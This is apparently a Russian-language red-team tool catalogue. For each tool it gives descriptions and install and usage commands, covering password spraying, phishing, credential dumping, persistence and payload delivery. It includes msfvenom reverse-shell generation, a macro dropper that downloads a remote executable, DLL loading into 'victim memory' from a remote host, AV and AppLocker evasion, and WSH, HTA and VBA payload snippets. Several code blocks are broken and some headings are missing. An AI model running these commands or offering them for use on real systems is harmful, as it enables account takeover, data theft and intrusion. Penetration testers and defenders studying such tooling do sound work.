Этот сайт предоставляет информацию о недокументированных внутренностях Windows, системных вызовах, структурах данных и других низкоуровневых деталях операционной системы Windows.
Он может быть ценным ресурсом для тех, кто хочет исследовать внутренности Windows для различных целей, включая анализ уязвимостей, разработку эксплойтов и повышение привилегий.
При разработке эксплойтов понимание внутренностей целевой системы имеет решающее значение. Этот сайт может помочь в разработке эксплойтов, используя низкоуровневые недокументированные аспекты Windows.
**Использование:**
Посетите [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

*Изображение взято с http://undocumented.ntinternals.net/*
### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html)
В этой технической заметке представлен всеобъемлющий список всех API, экспортируемых ядром Windows, для драйверов, позволяющих регистрировать callback-функции, которые вызываются компонентами ядра в различных обстоятельствах.
Большинство этих функций описаны в Windows Driver Kit (WDK), но некоторые из них предназначены для использования встроенными драйверами.
Недокументированные функции кратко описаны, тогда как документированные просто перечислены здесь для справки.
**Использование:**
Посетите [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

*Изображение взято с https://codemachine.com*
### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)
Коллекция атакующих техник, скриптов и полезных ссылок для выполнения кода и обхода защиты с помощью макросов Office.
**Использование:**
Посетите [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

*Изображение взято с https://github.com/S3cur3Th1sSh1t*
### [🔙](#tool-list)WSH
**Создание полезной нагрузки:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
Выполнить:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**Создание полезной нагрузки:**```html
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Выполнить: Запустить файл
Создание полезной нагрузки:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**Выполнить:** Установите функцию Auto_Open() в документе с поддержкой макросов
Первоначальный доступ
====================
### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)
Запуск атаки подбором паролей / перебором через прокси-пропуск Amazon AWS, с изменением IP-адреса запроса для каждой попытки аутентификации. Это динамически создает API FireProx для более скрытных атак подбором паролей.
CredMaster предоставляет метод выполнения анонимных атак подбором паролей против конечных точек в простом и удобном инструменте. Инструмент FireProx обеспечивает смену IP-адреса запроса, в то время как основа CredMaster подделывает всю остальную идентифицирующую информацию.
Возможности:
- Полностью поддерживает все регионы AWS
- Автоматически генерирует API для прокси-пропуска
- Подделывает номера отслеживания API, IP-адреса forwarded-for и другие заголовки отслеживания прокси
- Многопоточная обработка
- Счетчики задержки паролей и конфигурация для обхода политики блокировки
- Легкое добавление новых плагинов
- Полностью анонимно
**Установка:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt
Полные инструкции по установке см. здесь.
Использование:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json
Этот инструмент требует ключи доступа к API AWS, руководство по их получению можно найти здесь: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

*Изображение взято с https://github.com/knavesec/CredMaster/wiki*
### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)
TREVORspray — это модульный инструмент для перебора паролей с поддержкой многопоточности, SSH-проксирования, модулей сбора данных и многого другого!
**Установка:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray
Использование:```bash
python3 ./trevorspray --recon evilcorp.com
python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10
python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token
Полные инструкции по использованию см. [здесь](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

*Изображение взято с https://github.com/blacklanternsecurity/TREVORspray*
### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)
Инструментарий, демонстрирующий другой подход к атаке QRLJacking, позволяющий выполнять удаленный захват учетных записей через фишинг QR-кодов для входа.
Он состоит из расширения браузера, используемого атакующим для извлечения QR-кода входа, и серверного приложения, которое получает QR-коды входа для отображения их на размещенных фишинговых страницах.
Демо [видео](https://www.youtube.com/watch?v=8pfodWzqMcU)
**Установка: (Расширение)**
Вы можете загрузить расширение в Chrome через функцию `Load unpacked`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked
После установки расширения обязательно закрепите его значок на панели расширений Chrome, чтобы он был всегда виден.
**Установка: (Сервер)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat
Использование:
./server/build/evilqr-server3. Убедитесь, что QR-код для входа виден, и нажмите на значок расширения **Evil QR** на панели инструментов. Если QR-код распознан, значок загорится цветами.
4. Откройте URL фишинговой страницы сервера: `http://127.0.0.1:35000` (по умолчанию)

*Изображение взято с https://breakdev.org/evilqr-phishing/*
### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)
Наиболее распространенной формой аутентификации является комбинация имени пользователя и пароля или ключевой фразы. Пароли иногда можно угадать, профилируя пользователя, например, дата рождения, никнейм, адрес, имя питомца или родственника, или распространенное слово, такое как Бог, любовь, деньги или пароль.
Именно поэтому был создан CUPP.
**Установка:**```bash
git clone https://github.com/Mebus/cupp;cd cupp
Использование:```bash
python3 ./cupp.py -i

*Изображение взято с https://github.com/Mebus/cupp*
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunny — это физический USB-инструмент для атак и многофункциональная система доставки нагрузок. Он предназначен для подключения к USB-порту компьютера и может быть запрограммирован на выполнение различных функций, включая манипулирование и эксфильтрацию данных, установку вредоносного ПО и обход мер безопасности.
[hackinglab: Bash Bunny – Руководство](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[Документация Hak5](https://docs.hak5.org/bash-bunny/)
[Хороший репозиторий полезных нагрузок](https://github.com/hak5/bashbunny-payloads)
[Страница продукта](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish. (GoPhish) Gophish — это мощный фреймворк для фишинга с открытым исходным кодом, который позволяет легко проверить, насколько ваша организация подвержена фишингу. (evilginx2) Автономный фреймворк для атак типа «человек посередине», используемый для перехвата учетных данных для входа вместе с сессионными cookie, что позволяет обходить двухфакторную аутентификацию.
**Установка:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
Использование:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
Эта платформа отлично подходит для создания кампаний начального доступа. 'SET имеет ряд собственных векторов атак, которые позволяют быстро создать правдоподобную атаку'.
**Установка:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
Использование:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
Отличный инструмент для атак перебором паролей. Может перебирать ряд сервисов, включая SSH, FTP, TELNET, HTTP и т.д.
**Установка:**```bash
sudo apt install hydra
Использование:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish — это продвинутый фишинговый инструмент, использующий технику, сочетающую поток аутентификации OAuth Device Code и QR-коды (см. [PhishInSuits](https://github.com/secureworks/PhishInSuits) для получения дополнительной информации о потоке OAuth Device Code в фишинговых атаках).
Этапы атаки:
- Отправка вредоносного QR-кода жертве
- Жертва сканирует QR-код с помощью мобильного устройства
- Жертва перенаправляется на сервер, контролируемый злоумышленником (запускает процесс аутентификации OAuth Device Code)
- Жертве отправляется код MFA по электронной почте (запускает 15-минутный таймер потока OAuth Device Code)
- Злоумышленник опрашивает на предмет аутентификации
- Жертва вводит код на легитимном сайте Microsoft
- Злоумышленник сохраняет токен аутентификации
**Установка:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
Примечание: Перед использованием любого из модулей обновите необходимую информацию в файле settings.config, отмеченную как Required.
Использование (Email Module):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**Использование (Серверный модуль):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisher — это инструмент, который позволяет злоумышленникам создавать и отправлять фишинговые письма жертвам для получения конфиденциальной информации.
Он включает такие функции, как настраиваемые шаблоны, управление кампаниями и возможности отправки электронных писем, что делает его мощным и простым в использовании инструментом для проведения фишинговых атак. С помощью King Phisher злоумышленники могут нацеливаться на отдельных лиц или организации с помощью целенаправленных и убедительных фишинговых писем, увеличивая шансы на успех своих атак.
Установка (Linux — Клиент и Сервер):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**Использование:**
После установки King Phisher, пожалуйста, следуйте [wiki-странице](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) для настройки SSH, конфигурации базы данных, SMTP-сервера и т.д.

Выполнение
====================
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responder — это инструмент для отравления протоколов LLMNR и NBT-NS в сети, позволяющий захватывать учётные данные и выполнять произвольный код.
Протоколы LLMNR (Link-Local Multicast Name Resolution) и NBT-NS (NetBIOS Name Service) используются системами Windows для разрешения имён хостов в IP-адреса в локальной сети. Если имя хоста не может быть разрешено с помощью этих протоколов, система отправляет широковещательный запрос для этого имени хоста в локальную сеть.
Responder прослушивает эти широковещательные запросы и отвечает поддельным IP-адресом, заставляя запрашивающую систему отправлять свои учётные данные атакующему.
**Установка:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
Использование:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
Полную информацию об использовании можно найти [здесь](https://github.com/SpiderLabs/Responder#usage).

*Изображение взято с https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
Утилита, входящая в состав библиотеки Impacket, которая может использоваться для извлечения хэшей паролей и других секретов из системы Windows.
Это делается путем взаимодействия с базой данных Security Account Manager (SAM) в системе и извлечения хэшированных паролей и другой информации, такой как:
- Хэши паролей для локальных учетных записей
- Билеты и ключи Kerberos
- Секреты службы LSA
**Установка:**```bash
python3 -m pip install impacket
Использование:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

*Изображение взято с https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM — это инструмент, предоставляющий интерфейс командной строки для Windows Remote Management (WinRM: *служба, позволяющая администраторам удалённо выполнять команды на машине Windows*).
Evil-WinRM позволяет злоумышленнику удалённо подключаться к машине Windows через WinRM и выполнять произвольные команды.
Некоторые возможности:
- Загрузка скриптов Powershell в память
- Загрузка DLL-файлов в память в обход некоторых антивирусов
- Загрузка x64-полезных нагрузок
- Поддержка Pass-the-hash
- Загрузка и скачивание локальных и удалённых файлов
**Установка: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
Установка: (Ruby gem)```bash gem install evil-winrm
Альтернативные инструкции по установке можно найти [здесь](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).
**Использование:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
Полная документация по использованию доступна здесь.

Изображение взято с https://korbinian-spielvogel.de/posts/heist-writeup/
Инструмент для выполнения в памяти VBScript, JScript, EXE, DLL файлов и сборок dotNET. Он может использоваться для загрузки и запуска пользовательских нагрузок на целевых системах без необходимости сбрасывать файлы на диск.
Установка: (Windows)```bash git clone http://github.com/thewover/donut.git
Для создания шаблона загрузчика, динамической библиотеки donut.dll, статической библиотеки donut.lib и генератора donut.exe. Запустите x64 командную строку разработчика Microsoft Visual Studio, перейдите в каталог, в который вы клонировали репозиторий Donut и введите следующее:```bash
nmake -f Makefile.msvc
Чтобы сделать то же самое, за исключением использования MinGW-64 на Windows или Linux, перейдите в каталог, куда вы клонировали репозиторий Donut, и введите следующее:```bash make -f Makefile.mingw
**Установка: (Linux)**```bash
pip3 install donut-shellcode
Использование:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
Для получения полной информации об использовании см. [GitHub страницу](https://github.com/TheWover/donut/#4-usage) donut.
См. [недавний пост в блоге](https://thewover.github.io/Bear-Claw/) от The Wover для получения дополнительной информации.

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
Инструмент, используемый для автоматизации обфускации и создания документов Office, VB-скриптов, ярлыков и других форматов для red teaming.
**Установка: (Бинарный файл)**
1. Загрузите последнюю версию бинарного файла с [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Загрузите бинарный файл на ПК с установленным подлинным Microsoft Office.
3. Откройте консоль, выполните CD в каталог с бинарным файлом и вызовите бинарный файл.
**Установка: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
Использование:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
Набор PowerShell-скриптов и модулей, которые могут быть использованы для достижения различных целей red teaming.
Некоторые возможности PowerSploit:
- Извлечение хэшей паролей и получение паролей в открытом виде из памяти
- Повышение привилегий и обход мер безопасности
- Выполнение произвольного PowerShell-кода и обход ограничений на выполнение
- Проведение сетевой разведки и обнаружения
- Генерация полезных нагрузок и выполнение эксплойтов
**Установка:** *1. Сохранение в папку модулей PowerShell*
Сначала необходимо скачать [папку PowerSploit](https://github.com/PowerShellMafia/PowerSploit) и сохранить её в папку модулей PowerShell.
Путь к папке модулей PowerShell можно узнать с помощью следующей команды:```
$Env:PSModulePath
Установка: 2. Установите PowerSploit как модуль PowerShell
Затем вам нужно будет установить модуль PowerSploit (используйте имя загруженной папки).
Примечание: Политика выполнения PowerShell может заблокировать вас, чтобы исправить это, выполните следующую команду.``` powershell.exe -ep bypass
Теперь вы можете установить модуль PowerSploit.```
Import-Module PowerSploit
Использование:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
Инструмент, который можно использовать для выполнения различных действий, связанных со средами Microsoft Active Directory (AD), таких как дамп хешей паролей, создание/удаление пользователей и изменение свойств пользователей.
Некоторые возможности Rubeus:
- Kerberoasting
- Атаки Golden ticket
- Атаки Silver ticket
**Установка: (Скачать)**
Вы можете установить неофициальную предварительно скомпилированную версию Rubeus [здесь](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).
**Установка: (Сборка)**
Rubeus совместим с [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Откройте [проект .sln](https://github.com/GhostPack/Rubeus), выберите "Release" и выполните сборку.
**Использование:**```
Rubeus.exe -h

Отличный инструмент для проверки конечной точки жертвы на наличие уязвимостей, связанных с процессами с высоким уровнем целостности, группами, перехватываемыми путями и т.д.
Установка: (Загрузка)
Вы можете установить неофициальную предварительно скомпилированную сборку SharpUp здесь.
Установка: (Компиляция)
SharpUp совместим с Visual Studio 2015 Community Edition. Откройте проект .sln SharpUp, выберите «Release» и соберите.
Использование:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) — это реляционная система управления базами данных, разработанная и продаваемая компанией Microsoft.
Этот набор инструментов C# для MS-SQL предназначен для наступательной разведки и пост-эксплуатации. Подробную информацию об использовании каждой техники смотрите в [wiki](https://github.com/skahwah/SQLRecon/wiki).
**Установка: (Бинарный файл)**
Вы можете скачать последнюю бинарную версию [здесь](https://github.com/skahwah/SQLRecon/releases).
**Использование:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases
# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
Полная информация об использовании доступна в вики.
Информацию об использовании модулей инструмента можно найти здесь.

Изображение взято со страницы справки SQLRecon
Этот ресурс представляет собой коллекцию наиболее распространённых и известных техник обхода AppLocker.
Поскольку AppLocker может быть настроен по-разному, @api0cradle ведёт проверенный список обходов (которые работают против правил AppLocker по умолчанию) и список возможных техник обхода (в зависимости от конфигурации) или тех, которые кто-то назвал обходом.
У них также есть список общих техник обхода, а также устаревший список методов выполнения через DLL.
Индексированные списки

Изображение взято с https://github.com/api0cradle/UltimateAppLockerByPassList
Лаунчер Empire на основе JavaScript и VBScript, который работает в собственном встроенном хост-процессе PowerShell.
Оба лаунчера работают в своём собственном встроенном хост-процессе PowerShell, поэтому нам не нужен PowerShell.exe.
Это может быть полезно, когда компания блокирует PowerShell.exe и/или использует решение для белого списка приложений, но не блокирует запуск JS/VBS файлов.
Использование:
Для версии JavaScript используйте следующую переменную:```javascript var EncodedPayload = ""
Для версии VBScript используйте следующую переменную:```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"

Изображение взято с https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html
Цель этого проекта — генерировать .html файлы, содержащие зашифрованный HTA-файл.
Идея заключается в том, что когда цель переходит на страницу, ключ извлекается, а HTA динамически расшифровывается в браузере и напрямую отправляется пользователю.
Это техника уклонения, позволяющая обойти проверку содержимого/типа файлов, реализованную некоторыми средствами безопасности.
Дополнительная техническая информация здесь.
Установка:``` git clone https://github.com/nccgroup/demiguise cd demiguise
**Использование:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

Изображение взято из https://github.com/nccgroup/demiguise
PowerZure — это проект на PowerShell, созданный для оценки и эксплуатации ресурсов облачной платформы Microsoft Azure. PowerZure был разработан из-за потребности в инструменте, который может выполнять как разведку, так и эксплуатацию Azure, AzureAD и связанных с ними ресурсов.
Нет абсолютно никаких причин запускать PowerZure на машине жертвы. Аутентификация осуществляется с использованием существующего файла accesstoken.json или через вход в Azure по запросу, что позволяет безопасно взаимодействовать с облачным экземпляром жертвы с вашего рабочего компьютера.
Установка:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1
**Использование:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget
Blog - Атака на Azure, Azure AD и знакомство с PowerZure

Изображение использовано с https://hakin9.org
Impacket предоставляет набор низкоуровневых привязок Python для различных сетевых протоколов, включая SMB, Kerberos и LDAP, а также библиотеки более высокого уровня для взаимодействия с сетевыми службами и выполнения конкретных задач, таких как дамп хэшей паролей и создание сетевых ресурсов.
Он также включает ряд утилит командной строки, которые можно использовать для выполнения различных задач, таких как дамп баз SAM, перечисление доверий домена и взлом паролей Windows.
Установка:```bash python3 -m pip install impacket
**Установка: (с примерами скриптов)**
Скачайте и распакуйте [пакет](https://github.com/fortra/impacket), затем перейдите в папку установки и выполните...```bash
python3 -m pip install .
Использование:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
netview.py domain/user:password -target 192.168.10.2
mssqlinstance.py 192.168.1.2
GetADUsers.py domain/user:password@IP
Отличная [шпаргалка](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) для использования Impacket.

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
Empire — это фреймворк для пост-эксплуатации, который позволяет создавать полезные нагрузки для установления удаленных соединений с системами жертв.
После выполнения полезной нагрузки в системе жертвы она устанавливает обратное соединение с сервером Empire, который затем можно использовать для выполнения команд и контроля целевой системы.
Empire также включает ряд встроенных модулей и скриптов, которые можно использовать для выполнения конкретных задач, таких как дамп хешей паролей, доступ к реестру Windows и эксфильтрация данных.
**Установка:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
Использование:```bash
./empire
list agents
list listeners
Отличная [шпаргалка](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) по использованию от [HarmJoy](https://github.com/HarmJ0y).

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
Инструментарий для сохранения персистентности в Windows, написанный на C#.
Проект имеет [wiki](https://github.com/mandiant/SharPersist/wiki).
**Установка: (Бинарный файл)**
Последний релиз можно найти [здесь](https://github.com/mandiant/SharPersist/releases).
**Установка: (Компиляция)**
- Загрузите файлы проекта из [репозитория GitHub](https://github.com/mandiant/SharPersist).
- Откройте проект в Visual Studio и перейдите в 'Tools' --> 'NuGet Package Manager' --> 'Package Manager Settings'
- Перейдите в 'NuGet Package Manager' --> 'Package Sources'
- Добавьте источник пакетов с URL "https://api.nuget.org/v3/index.json"
- Установите пакет NuGet Costura.Fody. Требуется более старая версия Costura.Fody (3.3.3), чтобы не нужна была Visual Studio 2019.
- `Install-Package Costura.Fody -Version 3.3.3`
- Установите пакет TaskScheduler
- `Install-Package TaskScheduler -Version 2.8.11`
- Теперь вы можете собрать проект самостоятельно!
**Использование:**
Полный список примеров использования можно найти [здесь](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Ligolo-ng — это простой, легкий и быстрый инструмент, позволяющий пентестерам создавать туннели через обратное TCP/TLS-соединение с использованием интерфейса tun (без необходимости в SOCKS).
Вместо использования SOCKS-прокси или перенаправителей TCP/UDP, Ligolo-ng создает пользовательский сетевой стек на основе Gvisor.
При запуске сервера ретрансляции/прокси используется интерфейс tun; пакеты, отправляемые на этот интерфейс, транслируются и затем передаются в удаленную сеть агента.
Установка: (Загрузка)